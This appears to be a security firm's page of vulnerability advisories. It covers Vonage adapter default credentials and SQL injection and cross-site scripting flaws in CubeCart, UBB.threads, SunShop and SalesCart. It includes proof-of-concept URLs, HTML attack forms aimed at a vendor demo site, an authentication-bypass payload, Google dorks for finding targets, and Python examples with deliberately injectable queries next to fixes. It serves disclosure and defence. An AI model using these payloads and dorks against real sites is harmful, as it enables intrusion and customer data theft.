While RedLevel focuses primarily on on-demand consulting for our business partners, we also conduct independent research and evaluation of consumer information technology products. The resulting findings are documented and published publicly on BugTraq, a major security mailing list.

VONAGE VoIP TELEPHONE ADAPTER DEFAULT MISCONFIGURATION

The administrative interface of the Vonage VoIP Telephone Adapter is, by default, reachable from the WAN (internet-facing) side of the device. The product ships with the default username 'user' and default password 'user' for the administrative backend. Users are advised to change this password immediately. With administrative access an attacker could cause a denial of service by uploading broken firmware to the device or by rebooting it repeatedly.

CUBECART v3.0.16 SQL INJECTION VULNERABILITY

An interesting SQL injection vulnerability was discovered in CubeCart v3.0.16. It cannot easily be exploited by traditional means; in fact, the exact vulnerable parameter was not pinpointed. User input passed to CubeCart is normally sanitized through the routine mySQLSafe, with one exception: the variable $option in include/cart.inc.php and in other files in the same directory. RedLevel was only able to reproduce the vulnerability with the Acunetix Web Vulnerability Scanner. The injected data evidently reaches the query through the user's cookie: in the error below, the literal text "Set-Cookie" has been interpolated into the WHERE clause, unquoted, where an option assignment ID was expected.

MySQL Error Occured
1064: You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'Set-Cookie' at
line 2
QUERY = SELECT cc3_CubeCart_options_bot.option_id, cc3_CubeCart_options_bot.value_id,
option_price, option_symbol, assign_id FROM `cc3_CubeCart_options_bot` INNER JOIN
`cc3_CubeCart_options_mid` ON cc3_CubeCart_options_mid.value_id =
cc3_CubeCart_options_bot.value_id INNER JOIN `cc3_CubeCart_options_top` ON
cc3_CubeCart_options_bot.option_id = cc3_CubeCart_options_top.option_id WHERE
assign_id = Set-Cookie

To fix this vulnerability, $option should be sanitized with mySQLSafe in all include files. Note that the value lands in the query unquoted (assign_id = ...): escaping quote characters alone does not protect such a numeric comparison, so the value should also be cast to an integer or bound as a query parameter.
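The unquoted interpolation behind the error above, as an added example that is not CubeCart's code: a constructed SQLite table stands in for cc3_CubeCart_options_bot, quote_escape stands in for what a routine like mySQLSafe does to quote characters (an assumption about its behaviour, not its implementation), and four query builders compare raw interpolation, quote-escaping with and without surrounding quotes, and a bound parameter with an integer cast.

```python
import sqlite3

# Constructed stand-in for CubeCart's options table (assumption: the real
# cc3_CubeCart_options_bot has more columns; three are enough here).
SCHEMA = """
CREATE TABLE options_bot (option_id INTEGER, value_id INTEGER, assign_id INTEGER);
INSERT INTO options_bot VALUES (1, 10, 7), (2, 11, 7), (3, 12, 8);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def quote_escape(value):
    """Doubles single quotes, the SQLite equivalent of what an escaping
    routine such as mySQLSafe does to the characters that end a string literal."""
    return str(value).replace("'", "''")


# 1. The pattern behind the CubeCart error: the value is dropped into the
#    query verbatim and unquoted, exactly like "WHERE assign_id = Set-Cookie".
def build_raw(assign_id):
    return f"SELECT option_id, value_id FROM options_bot WHERE assign_id = {assign_id}", ()


# 2. Escaping applied, but the value is still unquoted: "7 OR 1=1" contains
#    no quote to escape, so it passes through unchanged.
def build_escaped_unquoted(assign_id):
    return (f"SELECT option_id, value_id FROM options_bot "
            f"WHERE assign_id = {quote_escape(assign_id)}", ())


# 3. Escaping applied and the value quoted: the payload becomes an ordinary
#    string that matches nothing (SQLite coerces a plain '7' back to 7).
def build_escaped_quoted(assign_id):
    return (f"SELECT option_id, value_id FROM options_bot "
            f"WHERE assign_id = '{quote_escape(assign_id)}'", ())


# 4. The robust form: validate the type, then bind the value as a parameter.
def build_bound(assign_id):
    return "SELECT option_id, value_id FROM options_bot WHERE assign_id = ?", (int(assign_id),)


def fetch_options(assign_id, builder):
    """Runs one builder against a fresh database; returns rows or raises
    (sqlite3.Error for broken SQL, ValueError for a failed integer cast)."""
    sql, params = builder(assign_id)
    with open_db() as conn:
        return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    builders = [("raw", build_raw), ("escaped_unquoted", build_escaped_unquoted),
                ("escaped_quoted", build_escaped_quoted), ("bound", build_bound)]
    for name, builder in builders:
        for value in ("7", "7 OR 1=1", "7' OR '1'='1", "Set-Cookie"):
            try:
                rows = fetch_options(value, builder)
                print(f"{name:17s} {value!r:16s} -> {rows}")
            except (sqlite3.Error, ValueError) as exc:
                print(f"{name:17s} {value!r:16s} -> error: {exc}")
```

Only the quoted-and-escaped and the bound forms neutralise "7 OR 1=1"; the bound form additionally rejects "Set-Cookie" before it ever reaches the database, which is the behaviour a fixed cart.inc.php should have.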

UBB.threads (<= v6.1.1) SQL INJECTION VULNERABILITY

The $_GET parameter 'C' in ubbthreads.php of UBB.threads (<= v6.1.1) is susceptible to SQL injection.
Proof of concept (a bare single quote in C): http://target.com/ubbthreads.php?Cat=cat&C='
Google d0rk: allintitle:"Forums powered by UBB.threads"

SUNSHOP v4 MULTIPLE VULNERABILITIES

After auditing a few shopping cart systems, we stumbled upon a group of related vulnerabilities in SunShop v4: cross-site scripting, cookie manipulation, and SQL injection vulnerabilities are prevalent. The proof-of-concept exploit follows; its first form submits a script tag in the 'l' parameter of index.php, and its second sends a bare single quote in the 'c' parameter.
<html>
<head><title>SunShop (v4) Multiple Vulnerabilities</title></head>
<body>
<center><br><br><font size=4>SunShop (v4) Multiple Vulnerabilities</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br>
<br>Google d0rk: <a href="http://www.google.com/search?q=+%22Powered+by+SunShop+Shopping+Cart%22">"Powered by SunShop Shopping Cart"</a>
</font><br>
<br><br>
<!-- Form 1: cross-site scripting. The 'l' parameter carries the script payload;
     the hidden remove/quantity/coupon fields reproduce a normal cart submission. -->
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="email@address.com">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>
<br>
<!-- Form 2: SQL injection. A bare single quote in the 'c' parameter of the product_list page. -->
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="c" size=75 value="'">
<input name="pg" type="hidden" value="1">
<input name="l" type="hidden" value="product_list">
<input type=submit value="Execute SQL Injection on variable 'c' in index.php" class="button">
</form>
</center>
</body></html>

SALESCART SHOPPING CART SQL INJECTION VULNERABILITY + PROOF-OF-CONCEPT EXPLOIT

SalesCart does not sanitize any user input submitted to cgi-bin/reorder2.asp, allowing an attacker to inject arbitrary characters into the SQL query and possibly to execute commands.
Google d0rk: "Sorry, you have no Items in your Shopping Cart !" inurl:cgi-bin/view1.asp
Vulnerable variables: all form fields in reorder2.asp
Vulnerable file: cgi-bin/reorder2.asp (proof of concept: submit the password x' OR 'x'='x)
Vendor status: notified multiple times, no response. Possible silent patch.
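The quote-terminated injection that the password x' OR 'x'='x relies on, and that the bare ' in the UBB.threads and SunShop proofs of concept above probes for, as an added example that is not SalesCart's code: the customers table, its rows and the email/password query are constructed assumptions, since the page does not document the real schema, and the targeted payload shows why a row-count check is no substitute for bound parameters.

```python
import sqlite3

# Constructed customer table standing in for whatever reorder2.asp queries;
# the real SalesCart schema is not documented, so this is an assumption.
SCHEMA = """
CREATE TABLE customers (email TEXT, password TEXT, orders INTEGER);
INSERT INTO customers VALUES ('alice@example.com', 'correct horse', 3),
                             ('bob@example.com',   'hunter2',       1);
"""


def lookup_vulnerable(conn, email, password):
    """String concatenation, the pattern in unsanitized classic-ASP code.
    The password x' OR 'x'='x rewrites the WHERE clause as
    (email = '...' AND password = 'x') OR 'x'='x', which is always true."""
    sql = ("SELECT email, orders FROM customers WHERE email = '" + email
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, email, password):
    """Bound parameters: the same password is compared as a literal string."""
    sql = "SELECT email, orders FROM customers WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


def run_lookup(lookup, email, password):
    """Runs one lookup against a fresh in-memory database and returns the rows."""
    with sqlite3.connect(":memory:") as conn:
        conn.executescript(SCHEMA)
        return lookup(conn, email, password)


def authenticate(lookup, email, password):
    """Returns the matched email only when exactly one row matches. This
    row-count check is NOT a defense: a payload that names a victim, such as
    x' OR email='alice@example.com, still yields exactly one row."""
    rows = run_lookup(lookup, email, password)
    return rows[0][0] if len(rows) == 1 else None


if __name__ == "__main__":
    bypass = "x' OR 'x'='x"
    targeted = "x' OR email='alice@example.com"
    print(run_lookup(lookup_vulnerable, "nobody@example.com", bypass))
    print(authenticate(lookup_vulnerable, "nobody@example.com", targeted))
    print(run_lookup(lookup_parameterized, "nobody@example.com", bypass))
    print(authenticate(lookup_parameterized, "alice@example.com", "correct horse"))
```

Against the concatenated query the tautology returns every customer and the targeted payload logs in as a chosen account; against the parameterized query both payloads are compared as literal passwords and match nothing. The same applies to the bare ' probe: it breaks the concatenated query with a syntax error and is simply a wrong password to the bound one.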